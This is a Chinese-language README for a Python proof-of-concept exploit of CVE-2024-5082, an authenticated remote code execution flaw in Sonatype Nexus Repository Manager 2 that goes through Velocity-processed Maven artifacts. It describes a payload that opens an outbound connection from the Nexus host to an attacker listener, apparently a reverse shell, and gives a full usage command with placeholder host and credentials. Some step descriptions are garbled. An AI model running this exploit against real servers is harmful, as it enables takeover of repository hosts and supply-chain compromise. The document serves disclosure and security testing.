
Sonatype Nexus 2 - 已授权RCE POC
此仓库包含 CVE-2024-5082 的 Python 概念验证代码,这是 Sonatype Nexus Repository Manager 2 中的一个远程代码执行漏洞。
该漏洞允许具有足够权限的用户发布特制的 Maven 工件,并将其标记为由 Velocity 内容生成器处理。当检索该工件时,Velocity 模板会被 Nexus 解析,并可能在 Nexus JVM 的安全上下文中执行命令。
根据 Sonatype 的说法:
命令是在 Nexus Repository 主机 上执行的。
从构建服务器、应用服务器或开发者工作站下载受影响的工件本身不会在消费端系统上执行嵌入的命令。然而,如果攻击者后来修改了受信任的工件、构建输入、凭据或仓库配置,则仓库管理器被攻破可能会造成更广泛的供应链风险。
该脚本:
maven-metadata.xml 文件上传到选定的托管仓库。velocity。提供的 payload 将从 Nexus 主机向配置的监听器地址发起出站 TCP 连接。
当前脚本使用 HTTP 基本身份验证,并且需要:
python3 cve_2024_5082.py \\
--base-url https://nexus.example.test/nexus \\
--repository security-test-snapshots \\
--username test-user \\
--password 'REDACTED' \\
--lhost LISTENER_IP \\
--lport 8000